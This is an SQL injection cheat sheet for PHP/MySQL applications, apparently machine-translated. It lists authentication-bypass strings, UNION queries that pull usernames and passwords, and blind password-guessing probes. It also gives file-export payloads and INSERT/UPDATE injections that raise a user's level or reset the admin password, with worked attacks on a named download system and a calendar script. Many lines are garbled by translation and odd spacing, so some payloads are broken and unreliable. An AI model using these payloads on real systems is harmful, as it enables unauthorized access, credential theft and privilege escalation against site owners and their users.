PHP injection Library
'Or 1 = 1
'Or' 1 = 1
'/*
'% 23
'And Password = 'mypass
Id =-1 Union select 1, 1
Id =-1 Union select char (97), char (97), char (97)
Id = 1 Union select 1, 1 from Members
Id = 1 Union select 1, 1 from Admin
Id = 1 Union select 1, 1 from user
Userid = 1 and Password = mypass
Userid = 1 and mid (password, 112) = char)
Userid = 1 and mid (password, 4, 1) = char (97)
And ord (mid (password, 111)> (ORD() returns the integer character code of the first character of its argument)
'And length (password) = '6 (probes the length of the password)
'And left (password, 1) =' m
'And left (password, 2) = 'my
.............................. And so on
'Union select 1, username, password from user /*
'Union select 1, username, password from user /*
= 'Union select 1, username, password from user/* (can be 1 or = followed directly)
99999 'Union select 1, username, password from user /*
'Into outfile' C:/file.txt (export file)
= 'Or 1 = 1 into outfile' C:/file.txt
1 'Union select 1, username, password from user into OUTFILE 'C:/user.txt
Select password from admins where login = 'john' into dumpfile'/path/to/site/file.txt'
Id = 'Union select 1, username, password from user into OUTFILE
Id =-1 Union select 1, database (), version () (flexible application query)
Commonly used query test statements (conditions intended to evaluate to true):
Select * from table where 1 = 1
Select * from table where 'uuu '= 'uuu'
Select * from table where 1 <> 2
Select * from table where 3> 2
Select * from table where 2 <3
Select * from table where 1
Select * from table where 1 + 1
Select * from table where 1--1
Select * from table where isnull (null)
Select * from table where isnull (COT (0 ))
Select * from table where 1 is not null
Select * from table where NULL is null
Select * from table where 2 between 1 and 3
Select * from table where 'B' between 'A' and 'C'
Select * from table where 2 in (0, 1, 2)
Select * from table where case when 1> 0 then 1 end
Example 1: Night Cat Download System, version 1.0
Id = 1 Union select, 1
Union select, 1 from ymdown_user
Union select 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 from ymdown_user where id = 1
Id = 10000 Union select, 1 from ymdown_user where id = 1 and groupid = 1
Union select 1, username, 1, password, 1 from ymdown_user where id = 1 (replace, look for a password)
Union select, 1 from ymdown_user where id = 1 and ord (mid (password )) = 49 (checks the first character of the password)
Union select, 1 from ymdown_user where id = 1 and ord (mid (password )) = 50 (second character)
Union select, 1 from ymdown_user where id = 1 and ord (mid (password,) = 51
..................................................................
Example 2: gray track transformation ID test (meteor)
Union % 20 (select % 20 allowsmilies, public, userid, '2017-0-0 ', user (), version () % 20 from % 20calendar_events % 20 where % 20 eventid % 20 = % 2013) % 20 order % 20by % 20 eventdate
Union % 20 (select % 20 allowsmilies, public, userid, '2017-0-0 ', pass (), version () % 20 from % 20calendar_events % 20 where % 20 eventid % 20 = % 2010) % 20 order % 20by % 20 eventdate
Constructed statements:
Select allowsmilies, public, userid, eventdate, event, subject from calendar_events where eventid = 1 Union (select 1, 1, 1, 1, 1 from user where userid = 1)
Select allowsmilies, public, userid, eventdate, event, subject from calendar_events where eventid = 1 Union (select 1, 1, 1, 1, username, password from user where userid = 1)
Union % 20 (select % ,,0, 2, '1970-01-01 ', 'A', password % 20 from % 20 USER % 20 where % 20 userid % 20 = % 1999) % 20 order % 20by % 20 eventdate
Union % 20 (select % ,,0, 12695, '1970-01-01 ', 'A', password % 20 from % 20 USER % 20 where % 20 userid = 1999) % 20 order % 20by % 20 eventdate
Union % 20 (select % ,,0, 12695, '1970-01-01 ', 'A', userid % 20 from % 20 USER % 20 where % 20 username = 'sandflee ') % 20 order % 20by % 20 eventdate (looks up the user ID of sandflee)
(Select a from table_name where a = 10 and B = 1 order by a limit 10)
Select * from article where ArticleID = '$ id' Union select * from ...... (can be submitted directly when the fields are the same as the article table's)
Select * from article where ArticleID = '$ id' Union select, 1 from ...... (when the fields differ)
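Special tips: entered in forms, search engines, and other places (_ and % are LIKE wildcards, which quote escaping and parameter binding leave intact, so they need their own escaping):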
"___"
".__"
"%
% 'Order by ArticleID /*
% 'Order by ArticleID #
_ 'Order by ArticleID /*
_ 'Order by ArticleID #
$ Command = "dir C:/"; system ($ command );
Select * from article where ArticleID = '$ id'
Select * from article where ArticleID = $ ID
1 'and 1 = 2 Union select * from user where userid = 1 /*
(Select * from article where ArticleID = '1' and 1 = 2 Union select * from user where userid = 1 /*')
1 and 1 = 2 Union select * from user where userid = 1
Statement formats: creating a database and table, inserting rows:
Create Database 'inobjection'
Create Table 'user '(
'Userid' int (11) not null auto_increment,
'Username' varchar (20) not null default '',
'Password' varchar (20) not null default '',
Primary Key ('userid ')
)
Insert into 'user' values (1, 'SWAp ', 'mypass ');
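Insert as a registered user (the $ variables are interpolated directly into the SQL string, so a submitted value can change the statement's structure, as in the userlevel examples below; binding the values as query parameters keeps them as data):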
Insert into 'user' (userid, username, password, homepage, userlevel) values ('', '$ username',' $ password', '$ homepage ', '1 ');
"Insert into membres (login, password, nom, email, userlevel) values ('$ login',' $ pass', '$ nom',' $ email ', '1 ')";
Insert into membres (login, password, nom, email, userlevel) values ('', '3') # ', '1 ')
"Insert into membres set login = '$ login', password =' $ pass', nom = '$ nom', email =' $ m '";
Insert into membres set login = '', password ='', nom = '', userlevel = '3', email =''
"Insert into membres values ('$ id',' $ login ',' $ pass', '$ nom',' $ email ', '1 ')";
Update user SET Password = '$ password', homepage =' $ homepage 'where id = '$ id'
Update user SET Password = 'md5 (mypass) 'Where username = 'admin' #)', homepage = '$ homepage' Where id = '$ id'
"Update membres SET Password = '$ pass', nom =' $ nom', email = '$ email' Where id = '$ id '";
Update membres SET Password = '[pass]', nom = '', userlevel = '3', email = ''where id = '[ID]'
"Update News set votes = votes + 1, score = score + $ note where idnews = '$ id '";
MySQL information functions:
Database ()
User ()
System_user ()
Session_user ()
CURRENT_USER ()
For example:
Update article set Title = $ title where ArticleID = 1 corresponding function
Update article set Title = database () Where id = 1
# Writes the current database name into the title field
Update article set Title = user () Where id = 1
# Update the current MySQL user name to the title Field
Update article set Title = system_user () Where id = 1
# Update the current MySQL user name to the title Field
Update article set Title = session_user () Where id = 1
# Update the current MySQL user name to the title Field
Update article set Title = CURRENT_USER () Where id = 1
# Writes the account the server authenticated the current session as (which can differ from the value of USER()) into the title field.
:::::::::::::::::::::::::::::::::::::::: :::::::::::::::::::::::::::::::::::
$ Req = "select * From membres where name like '% $ search %' order by name ";
Select * From membres where name like '%' order by uid # % 'order by name
Select * From membres where name like '%' order by uid # % 'order by name
Select uid from admins where login = ''or 'A' = 'A' and Password ='' or 'A' = 'A' (Classic)
Select uid from admins where login = ''or admin_level = 1 # 'and Password =''
Select * from table where MSG like '% hop'
Select uid from membres where login = 'bob' and password like 'a % '#' and Password =''
Select * From membres where name like '%' order by uid # % 'order by name